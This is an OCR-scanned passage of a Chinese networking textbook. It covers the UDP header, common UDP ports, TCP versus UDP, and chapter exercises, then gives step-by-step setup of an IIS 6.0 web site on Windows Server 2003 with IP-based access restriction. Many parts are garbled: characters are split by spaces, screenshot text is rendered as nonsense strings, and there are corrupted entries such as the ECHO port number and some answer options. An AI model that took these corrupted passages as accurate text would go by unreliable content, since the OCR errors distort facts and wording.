始 报 文 交付 相应 进程 。 其 不 可 靠 性 主要 体现 在 中 间 节 点 和 目的 节点 一 般 不 对 数据 段 检 错 确 
认 。 也 就 是 说 ,发 送 方 不 关心 数据 段 能 否 抵达 目的 节点 ,数据 是 否 发 生 差错 ,只 是 尽 最 大 努 
力 投递 ; 中 间 转 发 节点 也 不 会 通告 数据 段 是 否 正常 接收 .是 否 检验 无 误 , 数 据 可 靠 性 可 由 其 
他 层 协 议 保障 。 因 此 ,UDP 用 户 数据 报 协议 适合 传输 少量 .可靠 性 和 实时 性 要 求 不 高 的 数 
据 , 数 据 段 首部 也 缩减 至 8B, 如 图 6-5 所 示 。 


0 一 ls |16 = 一 31 
16 位 源 端口 号 16 位 目的 端口 号 
16 位 UDP 长 度 16 位 UDP 校 验 和 
数据 


图 6-5 UDP 数据 段 格式 


(1) 源 端口 号 。 第 一 行 前 0 一 15 共 16 位 是 源 端口 号 ,用 于 标识 应 用 进程 ,这 和 TCP 协 
议 源 端口 号 一 样 。 

(2) 目的 端口 号 。 第 一 行 后 16 一 31 共 16 位 是 目的 端口 号 ,对 应 于 目的 节点 应 用 进程 
的 监听 端口 。 

(3) UDP 长 度 。 第 二 行 前 0 一 15 位 是 UDP 长 度 ,用 于 指明 第 三 行 数据 段 携带 数据 大 
小 ,通过 长 度 值 可 以 精确 定位 数据 段 结束 位 置 。 

(4) UDP 校 验 和 (可 选 )。16 一 31 位 是 UDP 校 验 和 ,属于 可 选项 ,选择 性 对 UDP 数据 
段 首部 进行 差错 检测 ,这 也 是 UDP 用 户 数据 报 协议 提供 的 唯一 保证 传输 可 靠 性 的 机 制 ,从 
而 提高 UDP 传输 实用 性 。 

(5) 数据 。 第 三 行 是 数据 ,所 携带 的 是 应 用 进程 发 送 的 二 进 制 数据 。 

UDP 用 户 数据 报 协议 以 其 高 速 灵活 的 传输 服务 在 实际 中 得 到 很 好 应 用 ,在 某 些 方面 有 
着 TCP 传输 控制 协议 不 可 比拟 的 优势 ,也 使 得 传输 层 可 以 根据 网 络 状况 ,传输 内 容 、 数 据 大 
小 、 客 户 要 求 灵活 选择 其 中 一 种 传输 方式 。 表 6-4 给 出 常用 UDP 端口 号 及 应 用 。 

表 6-4 常用 UDP 端口 号 及 应 用 


UDP 端口 号 协 议 说 明 
党 ECHO 回 送 应 答 端口 
69 TFTP 简单 文件 传输 协议 ,用 于 小 量 数据 传输 
53 DNS 域名 服务 ,用 于 将 域名 如 www. 163. com 解析 成 IP 地 址 
111 RPC 远程 过 程 调 用 协议 
161 SNMP 简单 网 络 管理 协议 


2. TCP 与 UDP 协议 的 区 别 
TCP 和 UDP 协议 都 基于 IP 网 络 层 协 议 , 但 两 者 是 截然 不 同 的 传输 理念 ,适用 于 不 同 
场合 数据 传输 。 这 里 要 注意 以 下 几 点 。 
(1) TCP 传输 控制 协议 是 面向 连接 协议 ,是 可 靠 的 传输 协议 ; 而 UDP 用 户 数据 报 协议 
a 
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是 无 连接 协议 ,是 一 种 简单 .尽力 而 为 的 传输 协议 。 这 也 意味 着 TCP 比 UDP 更 为 复杂 , 需 
要 更 多 的 系统 开销 。 

(2) UDP 用 户 数据 报 协议 之 所 以 不 可 靠 是 因为 它 不 具有 像 TCP 那样 的 接收 应 答 机 制 
和 乱 序 重组 机 制 , 甚 至 不 对 受 损 数 据 段 重 传 。 因 此 ,UDP 用 户 数据 报 协议 更 适合 传输 小 量 
数据 。 

(3) UDP 用 户 数据 报 协议 虽然 不 可 靠 , 但 并 不 意味 UDP 是 无 用 协议 ,更 不 意味 传输 数 
据 一 定 会 产生 差错 ,只 是 应 用 场合 与 TCP 不 同 而 已 。 
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本 章 重 点 讲述 传输 层 TCP 和 UDP 协议 封装 格式 和 应 用 领域 ,要 求 读者 识 记 传 输 层 基 
本 功能 ,理解 端口 号 的 划分 和 作用 、TCP 三 次 握手 建立 连接 的 过 程 ,最 后 掌握 TCP 和 UDP 
协议 的 共同 点 和 区 别 。 本 章 知识 结构 如 图 6-6 所 示 。 


作用 : 提供 端 到 端 连接 ,将 报 文 传输 至 目的 主机 的 应 用 程序 
给 报 文 加 上 端口 号 ,实现 双方 主机 应 用 程序 之 间 的 逻辑 连接 
报 文 分 段 和 重组 { 发 送 方 将 报 文 切 成 数据 包 

传输 层 4 功能 接收 方 组 合 数据 包 转变 为 报 文 
| 差错 控制 .流量 控制 (可 选 ) 


质量 服务 QoS 

面向 连接 的 TCP 传输 控制 协议 
无 连接 的 UDP 用 户 数据 报 协议 
图 6-6 第 6 章 知识 结构 图 


两 种 传输 服务 ( 


思考 练习 题 

一 、 填空 题 

1. 在 OSI 参考 模型 中 ,传输 层 实 现 连接 ,网 络 层 实现 连接 ,数据 链 路 

2. TCP 传输 控制 协议 是 的 协议 ,可 靠 性 高 ; 而 UDP 用 户 数据 报 协议 是 无 连 
接 的 协议 ,可靠 性 低 。 

3. 传输 层 要 建立 连接 ,是 通过 TCP 传输 控制 协议 的 来 完成 的 。 

4. 在 OSI 参考 模型 中 ,传输 层 传输 的 单位 称 为 。 

5. TCP 第 三 次 握手 是 确认 的 身份 。 

二 、 选 择 题 

1. 若 UDP 数据 段 在 传输 中 丢失 了 , 则 < 


A. 网 络 设备 通知 发 送 端 重 传 数据 段 
B. 发 送 端 自动 重 传 数据 段 
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C. 客户 端 要 求 发 送 端 重 传 数据 段 
D. 以 上 都 不 对 


2. 如 果 一 个 数据 段 的 起 始 序列 号 为 1, 则 接收 方 对 这 个 数据 段 的 确认 号 为 1000 表 


6; 
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A. 已 经 成 功 地 收 到 了 999 个 字 节 B. 已 经 成 功 地 收 到 了 1000 字 节 
C. 数据 段 999 已 收 到 D. 数据 段 1000 已 收 到 
. IP 协议 负责 的 通信 ,而 TCP 传输 控制 协议 则 负责 的 通信 。 
A. 主机 到 主机 ,进程 到 进程 B. 进程 到 进程 ,主机 到 主机 
C. 进程 到 进程 ,网 络 到 网 络 D. 网 络 到 网 络 , 进 程 到 进程 
. 在 OSI 参考 模型 中 ， 向 用 户 提供 可 靠 的 端 到 端 服务 ,透明 地 传送 报 文 。 
A. 网 络 层 B. 数据 链 路 层 C. 会 话 层 D. 传输 层 
以 下 不 属于 UDP 用 户 数 据 报 协 议 的 特性 是 
A. 提供 可 靠 服 务 B. 提供 无 连接 服务 
C. 提供 端 到 端 服 务 D. 提供 全 双 工 服务 
以 下 关于 TCP/IP 协议 的 描述 中 ,错误 的 是 
A. 地 址 解析 协议 ARP/RARP 属于 应 用 层 
B. TCP .UDP 协议 都 要 通过 IP 协议 来 发 送 、 接 收 数据 
C. TCP 传输 控制 协议 提供 可 靠 的 面向 连接 服务 
D. UDP 用 户 数 据 报 协议 提供 简单 的 无 连接 服务 
. DNS 域名 系统 的 端口 号 是 。 
A. 21 B. 80 OA 六 六 
. 0 一 1023 端口 号 是 所 有 用 户 和 操作 系统 共同 认 知 的 , 称 之 为 5 
A. 静态 端口 B. 动态 端口 C. 熟知 端口 D. 应 用 端口 
. TCP 的 差错 控制 包括 
A. 校 验 和 B. 确认 C. 超时 重 发 D. 停止 传输 
0. Telnet 端口 号 是 
A. 20 B. 21 的 D. 80 
三 、 简 答题 
. 简 述 传输 层 的 功能 和 作用 。 
. 简 述 端口 号 的 分 类 和 区 别 。 
. 简 述 TCP 三 次 握手 建立 连接 的 过 程 。 
. 简 述 TCP 传输 控制 协议 和 UDP 用 户 数据 报 协议 的 区 别 。 
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应 用 层 是 用 户 与 网 络 的 接口 层 ,为 用 户 访问 网 络 提供 可 视 化 界面 。 应 用 层 由 操作 系统 
和 应 用 程序 组 成 ,属于 OSI 参考 模型 的 最 高 层 。 本 章 主 要 讲述 基于 应 用 层 网 络 协议 和 应 用 
服务 ,以 真实 工作 任务 带动 协议 理论 的 深化 ,包括 信息 发 布 平 台 、DNS 域名 系统 和 DHCP 
动态 网 络 配 置 等 服务 ,从 中 掌握 服务 器 安装 、 维 护 和 配置 的 基本 职业 技能 。 


1. 知识 目标 

(1) 理解 FTP 协议 的 主动 模式 和 被 动 模式 。 
(2) 识 记 两 种 DNS 域名 系统 的 解析 过 程 。 
(3) 识 记 基本 通用 顶层 域名 和 国家 顶层 域名 。 
(4) 识 记 DHCP 协议 更 新 租约 的 过 程 。 

2. 能 力 目 标 

(1) 掌握 信息 发 布 平台 的 使 用 。 

(2) 掌握 DNS 域名 系统 的 基本 配置 。 

(3) 掌握 DHCP 服务 的 基本 配置 。 


7.1 发 布 Web 站 点 


工作 任务 七 发 布 Web 站 点 


工作 目的 

安装 和 配置 Web 服务 。 

工作 任务 

小 张 是 企业 网 管 中 心 人 员 , 因 公 司 业 务 需求 需要 搭建 Web 服务 器 发 布 商品 信息 。 网 页 
已 经 做 好 ,可 在 www. gdcp. cn/jpkc/lf 下载, 现在 小 张 需 将 其 发 布 在 Windows 2003 服务 器 
上 ,并 配置 站 点 访问 控制 安全 ,禁止 非 授权 用 户 对 Web 网 站 的 访问 ,具体 工作 环境 拓扑 图 如 
图 7-1 所 示 。 

工作 环境 和 工具 

微软 Windows Server 2003 集成 IIS(Internet Information Services) 互 联网 信息 发 布 平 
台 , 可 以 用 于 发 布 和 管理 Web 站 点 ,通过 HTTP 超 文本 传输 协议 传送 将 文本 声音、 图 像 等 
各 种 信息 组 合 以 供 客户 浏览 访问 。 
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交换 机 
LS LS 
| 
主机 2 授权 客户 机 主机 3 非 授权 客户 机 
IP: 192.168.1.20 E IP: 192.168.1.30 
Mask : 255.255.255.0 Mask : 255.255.255.0 
主机 1 Web 服 务 器 


IP: 192.168.1.10 
Mask : 255.255.255.0 


[主机 名 称 担任 角色 | 操作 系统 。 ”外地 址 工具 

| E 机 1 jwebl 甸 中 Windows Server 2003 | 192.168.1.10 a 
| 主机 2 | 授权 客户 机 |Windows XP | 192.168.1.20 

| _ 主 和 3 | 非 授权 客户 机 | Windows xP | 192.168.130 


图 7-1 工作 任务 七 的 工作 环境 拓扑 图 


工作 过 程 
1. 安装 HIS 的 Web 服务 
(1) 当 安 装 Windows 2003 时 ,除了 Windows Server 2003 Web 版 之 外 ,其 余 版 本 默认 


不 安装 IIS 服务 以 避免 恶意 攻击 。 启 动 主机 1 进入 Windows 2003 ,选择 “控制 面板 ”命令 ， 
在 打开 的 窗口 中 单 击 “ 添 加 /删除 程序 ”链接 ,然后 单 击 " 添 加 /删除 Windows 组 件 ” 链 接 ,在 
组 件 列表 中 选中 “应 用 程序 服务 器 ”选项 ,如 图 7-2 所 示 。 


Yindows 组 件 向 导 划 


Windows 组 件 二 
可 以 添加 或 所 除 Windows 的 组 件 。 ey] 


口 认 证 书 服 劳 TE 
口 .如 终生 服务 器 00m 一 
门 村 终端 服务 器 枝 权 osm 到 
描述: ASP._ WET ，Internet 信息 服务 (ITS) 和 应 用 程序 服务 器 控制 
所 需 磁 盘 空间 3.4 mB 

可 用 磁盘 空间 ; 6025.7 MB | 


mW | zw | 


图 7-2 选中 “应 用 程序 服务 器 "组 件 


(2) 单 击 “ 详 细 人 信息" 按钮 ,在 弹出 的 “应 用 程序 服务 器 ”对 话 框 ,选中 “Internet 信息 服务 
(IIS)” 选 项 ,如 图 7-3 所 示 。 在 安装 过 程 中 ,会 提示 两 次 插入 Windows 2003 安装 盘 ,根据 安 


装 向 导 指 示 完 成 IIS 安装 。 


要] 


网 络 技术 基础 与 安全 


到 
a ER 会 天 村 让 伯 的 


TOME 
0.0 mmB 


问 方 癌 
口 芍 晶 用 网 mmc 访问 


口 喇 消息 队 列 7T.0 轨 
口 窗 应 用 程序 服务 器 控制 台 om 


描述 : ITS 包括 Webs，FTP ,SNTP 和 MNTP 支持 ， FrontPage Server 
Extension 和 Active Server Page (ASP) i 


所 需 磁 盘 裤 间 : 3.4 上 详细 信息 ) 


6024.6 MB 一 


图 7-3 Internet 信息 服务 (IIS) 组 件 


2. 建立 Web 站 点 

(1) 启动 IIS ,选择 “开始 ”一 所 有 程序 ”管理 工具 ”一 ”Internet 信息 服务 管理 器 ” 命 
令 ,在 打开 的 “Internet 信息 服务 (IIS) 管 理 器 "配置 窗口 中 。 右 击 “ 网 站 ?选项 并 选择 “新建 
“网 站 ”命令 ,如 图 7-4 所 示 , 弹 出 “网 站 创建 向 导 ” 对 话 框 。 


则 Internet 信息 服务 (IIS) 管 理 器 =I95lx| 
各 文件 四 操作 () 查看 WD 窗口 如 才 助 D | =18)x| 
和 小 | 外 | 夯 | 办 日 妃 | 岛 国 | 尽 | 1 


Internet 信息 服务 
日 蔓 主机 ! (本 地 计算 机 ) 


默认 网 站 


图 7-4 新 建 网 站 


(2) 进入 “网 站 描述 ”对 话 框 ,在 “描述 "文本 框 中 输入 站 点 名 称 , 以 便 管 理 员 标识 和 管理 
多 个 Web 站 点 ,如 输入 “Orange 网 站 ”, 如 图 7-5 所 示 。 

(3) 单 击 “ 下 一 步 ” 按 钮 进入 “IP 地 址 和 端口 设置 "对 话 框 ,在 “网 站 IP 地 址 ”下 拉 列 表 中 
选中 服务 器 (主机 1)IP*192. 168. 1.10”, 在 “网 站 TCP 端口 ”文本 框 中 输入 Web 服务 默认 端 
口号 “80”0, 如 图 7-6 所 示 。 这 里 不 要 配置 主机 头 , 主 机 头 用 于 同时 发 布 多 个 站 点 ,在 后 续 任 
务 中 会 详细 讲述 。 


@@ 客户 机 访问 Web 服务 器 网 站 完整 格式 为 “http://IP :端口 ”, 例 如 广东 交通 职业 技术 学 院 Web 服务 器 IP 为 110. 
64. 98. 8, 输 入 http://110. 64. 98. 8:80 访问 。 当 Web 服务 使 用 默认 80 端口 时 ,客户 机 只 需 输入 http://110. 64. 98. 8 即 
可 ,80 端口 号 由 浏览 器 自动 追加 。 
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网 站 创建 向 导 


网 站 描述 用 于 帮助 管理 员 识 别 站 点 


铀 入 网 站 搓 述 。 
ET | 


[rr 


《< 上 - 步 吕 [下 步 加。 职 汉 


图 7-5 Web 网 站 描述 


到 
IP 地 址 和 庄 口 设置 人 
指定 新 网 站 的 IP 地 址 ,端口 设置 和 主机 头 。 -者 


网 站 IP 地 址 下) 


Peer 本 


网 站 TCP 端口 默认 值 : 80) 中: 
0 


此 网 站 的 主机 头 默认 : 无 ) 0D) 


有 关 更 多 信息 ， 请 参阅 IIS 产品 文档 。 


《上 一 步 @) [下 -和 步 中 > 取消 


图 7-6 指定 端口 号 


(4) 将 Orange 网 页 文件 (在 www. gdcp. cn/jpkc/lf 下 载 ) 复 制 到 C 盘 根 目录 , 单 击 “ 下 
一 步 ”按钮 进入 “网 站 主 目录 ”对 话 框 , 单 击 “ 浏 览 ” 按 钮 并 找到 网 站 主页 文件 “index. asp” 所 
在 路 径 , 或 直接 在 路径” 中 输入 绝对 路 径 “C:\Orange\source\web”, 如 图 7-7 所 示 。 

(5) 单 击 “ 下 一 步 ” 按 钮 进入 “网 站 访问 权限 ”对 话 框 ,在 "允许 下 列 权 限 ” 选 项 组 中 选中 
“ 读 取 ”和 “运行 脚本 ” 复 选 框 ,如 图 7-8 所 示 。 各 权限 功能 如 下 。 

@ 读 取 : 用 户 可 以 访问 网 站 文件 ,默认 开启 读 取 权 限 ,否则 用 户 无 法 浏览 网 页 。 

@ 运行 脚本 : 允许 用 户 访问 和 执行 脚本 代码 。 脚 本 Script 是 依据 一 定格 式 编写 控制 
计算 机 运算 操作 的 代码 ,可 直接 在 计算 机 中 和 运行。 常见 脚本 语言 有 JavaScript、VBScript、 
ASP.、JSP、PHP 等 。 

@ 执行 : 允许 用 户 访问 和 执行 其 他 语言 规范 编写 的 程序 。 例 如 ,CGI 是 一 个 在 Web 服 
务 器 和 CGI 程序 之 间 传 递 信息 的 规范 ,可 以 用 任意 编程 语言 编写 ,如 C、Java、 Visual 
Basic 等 。 

@ 写 入 : 用 户 可 以 写 入 文件 到 网 站 目录 。 例 如 ,用 户 需 要 在 论坛 上 回帖 ,必须 将 记录 
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网 站 主 目录 
主 目录 是 Web 内 容 子 目录 的 根 目 录 。 


re | 


y 


7-8 配置 站 点 访问 权限 


写 入 网 站 数据 库 , 此 时 必须 开启 “ 写 入 ”权限 。 

@ 浏览 : 用 户 以 目录 形式 查看 网 站 目录 下 文件 和 子 目 录 , 既 不 利于 用 户 访问 ,又 存在 
安全 隐患 ,一 般 不 启用 。 

3. 配置 站 点 属性 

(1) 此 时 ,在 “网 站 ”目录 中 会 出 现 刚刚 新 建 的 "Orange 网 站 ”。 选 中 “Orange 网 站 ” 选 
项 , 右 击 并 选择 “属性 ”选项 ,继续 配置 站 点 。 

(2) 选择 “文档 ”选项 卡 , 修 改 浏览 器 默认 加 载 的 主页 文件 名 称 。 单 击 “ 添 加 ”按钮 输 
入 Orange 网 站 主页 文件 名 “index. asp?@, 并 通过 单 击 * 上 移 ? 按 钮 将 其 上 移 至 顶部 ,如 
图 7-9 所 示 。 


@ Web 站 点 主页 文件 名 一 般 为 index( 索 引 ) 或 者 default( 默 认 ), 其 扩展 名 有 . asp、. jsp、. htm、. html、. php 等 。 然 
而 TS 默认 主页 名 只 有 default htm .index. htm 和 default asp 三 项 ,此 时 可 根据 实际 自行 添加 主页 文件 名 称 , 还 可 更 改 
文件 搜索 顺序 以 节约 客户 机 浏览 站 点 时 间 。 
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Ed 
目录 安全 性 1 TIP 头 | 自 定义 错误 
网 | 性 能 |  ISAEI 第 过 器 | 主 目录 文档 


三 启用 文档 页 肢 0) 
En ML 格式 的 页 脚 到 | 站 的 feb 服务 器 返回 的 每 一 个 文 


| | 神 览 呵 


CC |] 了 | 哺 册 天 助 | 
图 7-9 添加 主页 文件 名 


(3) 现 禁止 非 授 权 用 户 ( 主 机 3) 访 问 该 站 点 。 选 择 “ 目 录 安 全 性 ”选项 卡 ,在 “IP 地 址 和 
域名 限制 ”对 话 框 中 单 击 “ 编 辑 ” 按 钮 ,选中 “授权 访问 " 单 选 按 钮 ,并 在 “下 列 除 外 ”列表 框 中 
添加 主机 3 的 IP“192. 168. 1. 30”, 如 图 7-10 所 示 。 


到 到 
网 站 ”| 性 能 “|  ISAPI 第 选 器 | 主 上 录 | 文档 | 
目录 安全 性 | IOTP 头 1 自 定义 错误 
ul 
IF 地 址 访问 限制 
默认 情况 下 ,所 有 计算 机 都 格 被 。 | 57 人 授权 访问 到) 
直列 除外 : 机 一 拒 站 访问 丰 


确定 | 取消 | _ 记 用 各 帮助 


图 7-10 限制 非 授权 用 户 


(4) 激活 Active Server Pages 选项 。 在 “Web 服务 扩展 ”列表 中 右 击 Active Server 
Pages 选项 并 选择 “允许 "命令 以 访问 ASP 类 型 网 站 ,如 图 7-11 所 示 。 
(5) 配置 NTFS 文件 访问 权限 。 若 网 站 存放 于 NTFSQ 格式 分 区 , 则 还 应 设置 文件 访 


@“ 若 磁盘 分 区 是 FAT 或 者 FAT32 格式 , 则 不 存在 文件 访问 权限 问题 ,可 跳 过 此 步骤 。 
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Internet 服务 (ITS) 管 理 器 


加 Tternet 信息 服务 
日 但 主机 1! 本 地 计算 机 ) 
点 


4 
[ 郊 评 feb 扩展 运行 | l 


图 7-11 人 允许 Active Server Pages 


问 权限 ,因为 客户 端 访问 Web 站 点 实际 上 是 访问 站 点 文件 。Windows 2003 中 的 Web 服务 
上 默认 访问 账号 是 “IUSR_LEE 主机 名 ”( 本 例 为 *IUSR_LEE 主机 1”), 需 把 其 添加 到 文件 
访问 权限 列表 中 。 右 击 “Orange 网 站 ”选项 并 选择 “权限 ”一 “添加 ”一 “高 级 "命令 ,在 弹出 的 
对 话 框 中 单 击 “ 立 即 查 找 ” 按 钮 添加 “IUSR_LEE 主机 10” 账号 ,如 图 7-12 所 示 。 


三 不 过期 客 轧 信 


自 上 次 加 录 所 天数 中， 厂 一 可 &9 


图 7-12 配置 NTFS 文 件 访问 权限 


4. 实验 结果 和 测试 
(1) 主机 2 启动 正 浏 览 器 ,在 地 址 栏 中 输入 http://192. 168. 1. 10 以 访问 主机 1 发 布 
的 Web 网 站 ,如 图 7-13 所 示 。 


@ 在 NTFS 格式 磁盘 中 ,系统 默认 所 有 账户 都 隶属 于 “Everyone" 组 ,因此 图 7-12 选择 Everyone 选项 也 可 以 
(“IUSR_ LEE 主机 1” 账户 也 隶属 于 "Everyone" 组 ) ,但 这 样 配置 存在 安全 风险 ,因为 所 有 账户 都 能 访问 该 文件 。 
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卫 Orange 季 食 专卖 后 - icrosoft Internet Explorer 


地 址 四 ) | 赴 http://192. 168.1.10/ 


了 


qq 促销 活动 | 季 食 知识 | 关于 我 们 | 


range 


甘 型 话 村 1 半 话 梅 
产地 :广东 新 突 人 产地 :广东 新 这 
单价 :1. 2750 单价 :1. 2/50g 


香 梨 片 一 品 梅 澳洲 梅生 

产地 :广东 新 兴 产地 :广东 新 兴 产地 :广东 新 兴 
单价 :1. 2/50g 单价 :1. 2/508 单价 :/50g 

肉 梅 奇异 果 小 朱古力 
产地 :广东 新 兴 产地 :广东 新 兴 产地 4 
单价 :/50g 单价 :/508 2 单价: 1, 2/508 
草 等 淮 盐 花生 有 RN 宣 惠 

产地 :广东 新兴 产地 : 山 未 ) 产地 : 

单价 :1. 5/50g 单价 :0. 8/50g 单价: 0, 65/50g 


12345 D> | 


零食 专卖 让 [|] @ 赤 找 


7-13 浏览 Orange 站 点 


(2) 主机 3 启动 正 浏览 器 ,在 地 址 栏 中 输入 http://192. 168. 1. 10 发 现 不 能 访问 主机 


1 发 布 的 Web 网 站 ,提示 “您 未 被 授权 查看 该 页 ”, 如 图 7-14 所 示 。 


加 您 未 被 授权 查看 该 页 - Hicrosoft Internet Explorer 


乱 ] http://192. 163.1. 10/ 


您 未 被 授权 查看 该 页 
您 汪 图 沪 问 的 Web 服务 器 上 有 一 个 不 祛 许 访问 充 同 站 的 I? 地 址 列表 ,并且 您 用 来 浏览 
的 计算 机 的 I 地 址 也 在 其 中 。 
请 尝试 以 下 换 作 
。 如 果 您 认为 自己 应 该 能 鲍 查 看 该 目录 或 页 面 ， 请 与 网 站 管理 员 联 系 。 


JITTF 错误 403.6 - 禁止 访问 : 守 尸 芒 的 IP 地 址 被 拒绝 . 
Internet 信息 服务 GTS) 


技术 信息 为 技术 支持 人 员 提 供 ? 


。 转 到 且 crosoft 产品 支持 给 务 并 搜索 包括 “ITTP” 和 “403” 的 标题 
。 打开 “IIS 帮助 ”( 可 在 ITS 管理 器 (inetaer) 中 访问 ) ,然后 搜索 标题 为 “ 关 


于 安全 ”、“ 按 匡 地 址 限制 访问 ”、“IP 地 址 访问 限制 ”和 “关于 自 定义 错误 消 
息 ” 的 主题. 


图 7-14 主机 3 未 授权 访问 


任务 总 结 顽 


客户 端 浏 览 Web 站 点 实际 上 是 访问 服务 器 站 点 文件 , 若 站 点 目录 是 NTFS 格式 分 区 ， 
则 发 布 站 点 存在 双 权 限 问题 : 中 Web 站 点 访问 权限 ,默认 账号 是 “TUSR_LEE 主机 名 ”， 
@NTFS 下 文件 访问 权限 。 若 非 NTFS 格式 分 区 , 则 不 存在 文件 访问 权限 问题 。 
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IIS 6.0(Internet Information Server) 互 联网 信息 服务 包括 Web 服务 ,FTP 服务 、 
NNTP 服务 和 SMTP 服务 ,分 别 用 于 发 布 Web 站 点 .FTP 站 上 点、 新闻 服务 和 发 送 邮 件 等 服 
务 。IIS 6.0 易于 管理 ,方便 维护 ,扩展 性 和 安全 性 都 比 之 前 版 本 有 很 大 提升 。 

1. 什么 是 Web 

长 期 以 来 人 们 通过 传统 媒体 ,如 电视 ,报纸 、 杂 志 、 广 播 等 获取 信息 ,这 种 被 动 方 式 难以 
满足 对 信息 分 类 过 滤 和 快速 检索 需求 。 随 着 计算 机 网 络 的 发 展 , 一 种 基于 Web 技术 主动 获 
取信 息 的 方式 应 运 而 生 。Web 是 万 维 网 (Word Wide Web,WWW) 的 简称 ,是 Internet 上 
使 用 最 广泛 的 多 媒体 信息 检索 服务 。 Web 将 丰富 多 彩 的 文字 .图片 声音 以 及 动画 通过 超 
文本 有 机 组 合 ,用 户 足 不 出 户 可 尽 览 天 下 大 事 ,是 连接 不 同 国家 、 不 同 种 族 、 不 同文 化 的 

2. Web 工作 原理 

Web 基于 客户 机 /服务 器 模式 ,由 浏览 器 和 服务 器 构成 ,通过 超 文本 传送 协议 (HTTP) 
将 信息 展现 给 客户 。Web 页 面 用 超 文本 标记 语言 (HTML) 编 写 , 可 以 说 入 声音 、 图 像 ,视频 
等 多 媒体 信息 ,默认 端口 号 为 80。Web 客户 通过 浏览 器 URL 地 址 连接 到 相应 Web 服务 
器 , Web 服务 器 把 相应 Web 文档 通过 HTTP 协议 响应 客户 端 ,客户 端 收 到 后 断 开 与 Web 
服务 器 连接 。 用 户 每 打开 一 个 页 面 ,都 会 重复 上 述 过 程 。 

3. 什么 是 URL 

URL(Uniform Resoure Locator) 统 一 资源 定位 符 用 于 描述 Internet 上 网 页 和 其 他 资源 
的 一 种 标识 方法 ,也 被 称 为 网 页 地 址 。 用 户 只 要 知道 菜 个 资源 的 URL 标识 ,就 可 以 通过 浏 
览 器 进行 访问 。URL 由 协议 类 型 .主机 名 、 端 口号 和 文件 名 四 部 分 组 成 ,如 http://www. 
gdcp. cn:80/jpkc/lf/index. htm。 

(1) 在 URL 中 ,第 一 个 冒号 前 面 的 用 于 指出 访 协议 类 型 ,如 httpQ https@ ftp .mms@、 
thunder@ 等 。 

(2)“// ”与 “/ ”之 间 的 是 服务 器 域名 或 IP 地 址 ,后 面 加 上 Web 服务 监听 端口 号 。 由 
于 HTTP 协议 默认 端口 号 是 80,80 端口 号 可 以 不 写 由 浏览 器 自动 追加 ,因此 上 例 URL 地 
址 也 可 以 简写 为 http://www. gdcp. cn/jpkc/lf/index. htm。 假 如 Web 服务 在 配置 端口 号 
时 不 使 用 80 端口 ,例如 利用 8080 端口 ,此 时 必须 在 浏览 器 中 输入 相应 端口 号 ,否则 默认 80 
端口 无 法 浏览 站 点 。 此 时 ,应 填 入 相应 地 址 http://www. gdcp. cn: 8080/jpkc/lf/ 
index. htm。 

(3) 第 一 个 “/” 以 后 是 相对 路 径 文 件 名 ,每 个 目录 用 “/” 隔 开 , 这 与 Windows 系统 路 径 
“\" 不 同 。 上 述 例子 表示 资源 存放 在 Web 服务 主 目录 下 “jpkc\lf” 中 的 “index. htm" 文 件 中 。 


四 超 文 本 传输 协议 ,默认 端口 号 为 80。 

加 https 可 以 看 成 是 HTTP 协议 的 安全 版 ,通过 数字 证 书 和 加 密实 现 浏览 器 和 Web 站 点 的 安全 传输 ,默认 端口 号 
为 443, 常 用 在 网 上 银行 .电子 商务 等 站 点 中 。 

图 “mms 微软 媒体 服务 器 协议 用 于 定位 Windows Media 服务 器 中 * . asf 流 媒 体 文件 ,默认 端口 号 为 1755。 

四 ”thunder 是 专用 下 载 链接 协议 ,用 于 访问 P2P 点 对 点 网 络 资源 ,如 迅雷 软件 采用 thunder 协议 定位 P2P 网 络 资源 。 
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文件 名 可 以 不 写 , 默 认 的 文件 名 是 Web 站 点 配置 的 默认 首页 名 。 因 此 ,上 述 地 址 又 可 以 简 
写 为 http://www. gdcp. cn/jpkc/lf。 

4. 什么 是 HTTP 

HTTP(HyperText Transfer Protocol) 超 文本 传输 协议 工作 于 TCP/IP 参考 模型 的 应 
用 层 , 是 客户 端 浏览 器 和 Web 站 点 之 间 的 通信 协议 。 所 谓 超 文本 ,是 指 采 用 链接 方式 将 各 
种 不 同 空间 的 文字 、 声 音 、 图 像 等 信息 有 机 组 织 在 一 起 的 网 状 文本 ,而 HTTP 协议 用 于 发 
送 、 接 收 和 解释 这 些 文 本 ,最 后 通过 浏览 器 显示 出 来 。 

5. 静态 页 面 和 动态 页 面 

静态 页 面 显示 内 容 不 依赖 用 户 意愿 而 改变 ,在 任何 时 候 访 问 结 果 都 是 一 样 的 ,因而 称 为 
静态 页 面 ,例如 x*.htm 和 *.html 都 是 静态 页 面 。 

静态 页 面 车 要 更 改 显示 内 容 则 必须 对 原文 件 进行 修改 ,这 给 站 点 设计 和 维护 带 来 不 便 ， 
由 此 引入 动态 页 面 。 动 态 页 面 需要 浏览 器 和 Web 站 点 之 间 交 互 ,根据 用 户 输入 和 设 定 选项 
读 取 数 据 库 以 显示 不 同 页 面 信息 ,页 面 修改 通过 站 点 后 台 对 数据 库 进行 更 新 ,并 会 因此 产生 
安全 问题 。 常 用 动态 页 面 有 x*.asp、* .jsp 和 x*.php 等 。 

静态 和 动态 页 面 有 各 有 优点 ,采用 静态 或 动态 主要 取决 于 站 点 功能 和 用 途 。 如 果 站 点 
功能 较 简单 ,发 布 内 容 不 需要 更 新 , 则 采用 静态 页 面 简单 高 效 ,并 且 可 以 有 效 避 免 主 页 纂 改 、 
黑客 入 侵 等 安全 问题 ; 若 页 面 需 要 与 客户 端 交 互 , 如 成 绩 查 询 站 点 需要 输入 考生 信息 提交 
查询 ,此 时 必须 采用 动态 页 面 技术 。 

静态 页 面 是 网 站 建设 基础 ,静态 页 面 和 动态 页 面 之 间 也 不 存在 矛盾 ,在 设计 站 点 时 需要 
结合 两 者 各 自 优点 ,做 到 长 短 互补 。 很 多 时 候 设计 一 个 站 点 既 有 静态 页 面 ,又 有 动态 页 面 。 


7.2 发 布 FTP 站 点 


工作 任务 八 发 布 FTP 站 点 


工作 目的 

安装 和 配置 FTP 服务 。 

工作 任务 

小 张 是 学 校 网 管 中 心 人 员 ,需要 在 Windows 2003 服务 器 发 布 FTP 站 点 实现 数字 化 教 
学 资源 共享 ,为 教师 端 提供 文件 上 传 和 下 载 服务 ,并 禁止 192. 168. 2. 0 学 生 网 段 对 FTP 资 
源 的 访问 。 

工作 环境 和 工具 

工作 任务 八 的 工作 环境 拓扑 图 如 图 7-15 所 示 , 工 具 和 录像 可 在 http://www. gdcp. cn/ 
jpkc/lf 中 下 载 。 

